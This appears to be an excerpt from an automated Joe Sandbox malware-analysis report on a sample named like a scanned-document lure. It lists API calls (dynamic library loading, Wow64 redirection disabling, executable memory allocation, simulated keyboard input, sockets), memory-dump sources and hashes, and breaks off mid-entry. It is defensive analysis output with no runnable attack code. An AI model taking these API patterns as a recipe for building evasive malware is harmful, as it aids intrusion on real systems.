                                                        • API ID: MessageSend$InvalidateParentRectTimeout
                                                        • String ID: @U=u
                                                        • API String ID: 3648793173-2594219639
                                                        • Opcode ID: 4fb43ebe527ea1d02e831d4b448bfaf0481764abfbb4d867a9e325cbcd94db89
                                                        • Instruction ID: ddc80b270c4d76119abc231472188b5203b2c8856b69b37425bbc64dd2200c18
                                                        • Opcode Fuzzy Hash: 4fb43ebe527ea1d02e831d4b448bfaf0481764abfbb4d867a9e325cbcd94db89
                                                        • Instruction Fuzzy Hash: 68F0A030100244FFEF205FA0DC09FA17BA8AB1A740F24823AF5419F0A2C7A25851AB90
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A24C2E), ref: 00A24CA3
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A24CB5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: cfe65706e92b60c2fbb34bb816f6614b1ebc14be65004d2a14695987c32badf3
                                                        • Instruction ID: d89a2e927a7b975d8337ceb199284545dde6f0177835d14dcfa17260d41024a0
                                                        • Opcode Fuzzy Hash: cfe65706e92b60c2fbb34bb816f6614b1ebc14be65004d2a14695987c32badf3
                                                        • Instruction Fuzzy Hash: AED01770510723DFDB249FBAEA58646B6E6AF0A791B11CC3AD886D6190E770D880CA60
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A24CE1,?), ref: 00A24DA2
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A24DB4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: 5291b766313eeb5dca328b9d6cb984b352546af845d3a7faefc688ffd39d3861
                                                        • Instruction ID: 7df9f925662900e4c455e4b6c2292f9c0dc1736bd980682412f674d18ad8dfc7
                                                        • Opcode Fuzzy Hash: 5291b766313eeb5dca328b9d6cb984b352546af845d3a7faefc688ffd39d3861
                                                        • Instruction Fuzzy Hash: A7D01731550723DFEB249FB5E848A8A76E5BF0A355B11CC3AD8C6D6290E770D880CA60
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A24D2E,?,00A24F4F,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24D6F
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A24D81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 90376c4660fcdaf963e1dbfac2847992c3b2937e982e336a3374399e931e8542
                                                        • Instruction ID: 76c59dc7c98b0e3ce3461b2807d917784d39a12cecb70ac6b7581e62b008cb2c
                                                        • Opcode Fuzzy Hash: 90376c4660fcdaf963e1dbfac2847992c3b2937e982e336a3374399e931e8542
                                                        • Instruction Fuzzy Hash: BAD01730510723DFDB249FB5E84865676E8BF1A352B11CD3AD487D6290E770D881CA60
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00AA12C1), ref: 00AA1080
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AA1092
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 65d796934ed2d8ff1895fea96d0b93bd15781d5c62d430fb844fa6ee91a07144
                                                        • Instruction ID: 5a9f777dd7f90a5455b0915fef05820e49af34e79ac796d02f9fa981a59c46a6
                                                        • Opcode Fuzzy Hash: 65d796934ed2d8ff1895fea96d0b93bd15781d5c62d430fb844fa6ee91a07144
                                                        • Instruction Fuzzy Hash: E9D0E231520713EFD7209BB5D958A5A76E4AF06361F128D2AA4CADA290E770C8808A60
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A99009,?,00AAF910), ref: 00A99403
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A99415
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 1ad403faaa7fdc004b5f8722d370bd7922c9649973d2f7c57b93ae1da63a9227
                                                        • Instruction ID: 556774a509449102b27460e46189dedccf7389423df22f9e8738649f8b6098d1
                                                        • Opcode Fuzzy Hash: 1ad403faaa7fdc004b5f8722d370bd7922c9649973d2f7c57b93ae1da63a9227
                                                        • Instruction Fuzzy Hash: EAD0C730650713EFCB309FB4C98820372E4AF22352B00CC3EE482C2690E770C881CB20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6eb62bb305d95bc6e74b94bc820e6f00b62956086e50566426f34adeb27c49c
                                                        • Instruction ID: 69f88e62a6941a9d4fb9c2210c04ec1ba069f25bcc167593b7ff8f06d9242603
                                                        • Opcode Fuzzy Hash: d6eb62bb305d95bc6e74b94bc820e6f00b62956086e50566426f34adeb27c49c
                                                        • Instruction Fuzzy Hash: A2C14B75A04216EFDB14CFA8CC84AAEB7B5FF48714B11C599E909EB251D730ED81CB90
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A9E3D2
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A9E415
                                                          • Part of subcall function 00A9DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A9DAD9
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A9E615
                                                        • _memmove.LIBCMT ref: 00A9E628
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 344cb161ca0ec18b7eb112a9f57b7ca59c7be5d67e8ed77541e338018a16c6a1
                                                        • Instruction ID: 7f1810586ed98ebb59361f68a2717d57d264d578b12c26580ed6b6299cb9cfbe
                                                        • Opcode Fuzzy Hash: 344cb161ca0ec18b7eb112a9f57b7ca59c7be5d67e8ed77541e338018a16c6a1
                                                        • Instruction Fuzzy Hash: F5C16B71A083119FCB14DF28C58096ABBE4FF88714F14896EF9999B352D731E946CF82
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A983D8
                                                        • CoUninitialize.OLE32 ref: 00A983E3
                                                          • Part of subcall function 00A7DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A7DAC5
                                                        • VariantInit.OLEAUT32(?), ref: 00A983EE
                                                        • VariantClear.OLEAUT32(?), ref: 00A986BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: e185eb1b2e59992e559ef5882941f96cedcb023c84791fa48e0c79c0cde6e994
                                                        • Instruction ID: b37297e75d90661adb12b5ea10c9c3cd22c97ff2e6936625d0c858d27c683715
                                                        • Opcode Fuzzy Hash: e185eb1b2e59992e559ef5882941f96cedcb023c84791fa48e0c79c0cde6e994
                                                        • Instruction Fuzzy Hash: A3A159753047119FDB10DF28C981A2AB7E4BF89764F04485DFA9A9B3A1CB34ED44CB41
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AB2C7C,?), ref: 00A77C32
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AB2C7C,?), ref: 00A77C4A
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00AAFB80,000000FF,?,00000000,00000800,00000000,?,00AB2C7C,?), ref: 00A77C6F
                                                        • _memcmp.LIBCMT ref: 00A77C90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: d447f75038b44017a8c9229b5917979889d4d19a067e491625257099ea4cc22f
                                                        • Instruction ID: 72f6aa00ee74743894bf166e6853345184b87658aa899ac4a60e71e2de23a67b
                                                        • Opcode Fuzzy Hash: d447f75038b44017a8c9229b5917979889d4d19a067e491625257099ea4cc22f
                                                        • Instruction Fuzzy Hash: 5B81FB75A00109EFCB05DFD4C984EEEB7B9FF89315F208598E516AB250DB71AE06CB60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 6715ce37d47028f423065908317c93e19c358aab65eea19074bf0fae4cb1deb9
                                                        • Instruction ID: ba24ca0ddf3eef70731d66eb63b71375e68de46fbcc3d35d796bf40ff5e2e314
                                                        • Opcode Fuzzy Hash: 6715ce37d47028f423065908317c93e19c358aab65eea19074bf0fae4cb1deb9
                                                        • Instruction Fuzzy Hash: 1251A4346087029ADB24AF79DC95B6EB3E5AF49310F20C82FE59ECB291DB709841DB11
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00A96CE4
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96CF4
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A96D58
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96D64
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: b636f026e8e7007a68a82c162898a483b9df4fe8608f33ccd6be97ae3c469527
                                                        • Instruction ID: 141b8e03ebdf05cceb1084acbfbdfeba7e4c76b96b71289b1641bdf7d531def1
                                                        • Opcode Fuzzy Hash: b636f026e8e7007a68a82c162898a483b9df4fe8608f33ccd6be97ae3c469527
                                                        • Instruction Fuzzy Hash: B041C574740610AFEB24AF68ED87F3A77E5DF08B10F448428FA599B2D2DB759C018B91
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00AAF910), ref: 00A967BA
                                                        • _strlen.LIBCMT ref: 00A967EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: 25fa23a9cbb9709be1ae48db7dba51f1d501fc8147f02e9d262c77c080d83128
                                                        • Instruction ID: c06072d7b3232069daacbdbe62f490842a8dbe5cdf0fd0e53c0d3f30881cccc0
                                                        • Opcode Fuzzy Hash: 25fa23a9cbb9709be1ae48db7dba51f1d501fc8147f02e9d262c77c080d83128
                                                        • Instruction Fuzzy Hash: A5418135A00114AFCF14EBA8DED5EAEB7E9AF48750F14C165F81A9B292DF30AD44CB50
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A8BB09
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00A8BB2F
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A8BB54
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A8BB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 4c21522149fd4a0db13f5c9fba0de35e880b7df1a576995cfcedb9e0212dfc22
                                                        • Instruction ID: f8ffd593315a3e7a6606703cf976a58ad4a3eacc5e1348178006aae744ae3ae7
                                                        • Opcode Fuzzy Hash: 4c21522149fd4a0db13f5c9fba0de35e880b7df1a576995cfcedb9e0212dfc22
                                                        • Instruction Fuzzy Hash: 13413B39600621DFDB11EF18D685A5EBBE1EF49720F098498E84A9B362CB31FD41CB91
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00AAAE1A
                                                        • GetWindowRect.USER32(?,?), ref: 00AAAE90
                                                        • PtInRect.USER32(?,?,00AAC304), ref: 00AAAEA0
                                                        • MessageBeep.USER32(00000000), ref: 00AAAF11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 779dce2f90a5f0dc2b222d2032ef3644abdef4e141d844a3af4d3cc7fdb1b9fd
                                                        • Instruction ID: 96ba86796b45a8252f9b8cb36a353f0d8ce4baa3fda7284ce11213b0818e2744
                                                        • Opcode Fuzzy Hash: 779dce2f90a5f0dc2b222d2032ef3644abdef4e141d844a3af4d3cc7fdb1b9fd
                                                        • Instruction Fuzzy Hash: 30419F70600229DFCB25CF98C884B6DBBF5FF6A740F1481A9E414CB291D731A802CF92
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A81037
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00A81053
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A810B9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A8110B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: ddd0777f98b669238b1772c19497749cdd85c695c9b9df895b8e04540527febe
                                                        • Instruction ID: f4792f3b2d52774c040d6f929bbcc7d93562e8a8f1538b6616b23a99324763ec
                                                        • Opcode Fuzzy Hash: ddd0777f98b669238b1772c19497749cdd85c695c9b9df895b8e04540527febe
                                                        • Instruction Fuzzy Hash: D6315830E40688AEFF34EBA58C09BFABBBDAB45311F08431AE584921D1C37589C79751
                                                        APIs
                                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00A81176
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A81192
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A811F1
                                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00A81243
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: b0cb831998f6129903ce03ccf4f9332ba7edeab3daec3288b461dd0573300955
                                                        • Instruction ID: 836de8377719a86e54abd04fd726dacc64f0c24e149bd54933e79226df2ccf39
                                                        • Opcode Fuzzy Hash: b0cb831998f6129903ce03ccf4f9332ba7edeab3daec3288b461dd0573300955
                                                        • Instruction Fuzzy Hash: 38312870E406185EEF34FBA58C08BFA7BBEAB49310F04432EE585921D1D33449579791
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5644B
                                                        • __isleadbyte_l.LIBCMT ref: 00A56479
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A564A7
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A564DD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
